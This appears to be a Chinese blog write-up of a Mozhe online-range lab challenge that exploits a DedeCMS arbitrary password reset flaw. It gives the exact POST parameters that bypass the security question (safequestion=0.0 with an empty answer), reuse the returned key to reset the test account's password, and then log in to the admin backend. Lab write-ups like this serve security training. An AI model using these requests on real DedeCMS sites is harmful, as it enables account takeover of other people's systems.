墨者学院-在线靶场 - CMS系统漏洞分析溯源(第7题)

墨者 在线靶场 CMS系统漏洞分析溯源(第7题)

DEDECMS 任意用户密码重置漏洞利用

 

开始用 admin 发现前台出错,后台也登录不了,改用 test 帐号

利用burp 抓包改 Post

http://219.153.49.228:47764/member/resetpassword.php

POST /member/resetpassword.php HTTP/1.1
dopost=safequestion&safequestion=0.0&safeanswer=&id=2  (2为 test 的ID)

image.png

forward 之后 获取跳转页面 里面的 key 值

image.png

再用 burp post   
 

 /member/resetpassword.php 
dopost=getpasswd&setp=2&id=2&userid=test&key=5S3NSMNQ&pwd=123456&pwdok=123456


key  为刚刚获取的 key 值,重置密码为 123456

 

用 test  密码 123456 登录,登录成功个人基本资料 有电子邮箱

用 电子邮箱 登录 后台 http://219.153.49.228:47764/dede/login.php

帐号 admin  密码 电子邮箱

登录成功,key 在 网站根目录下

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值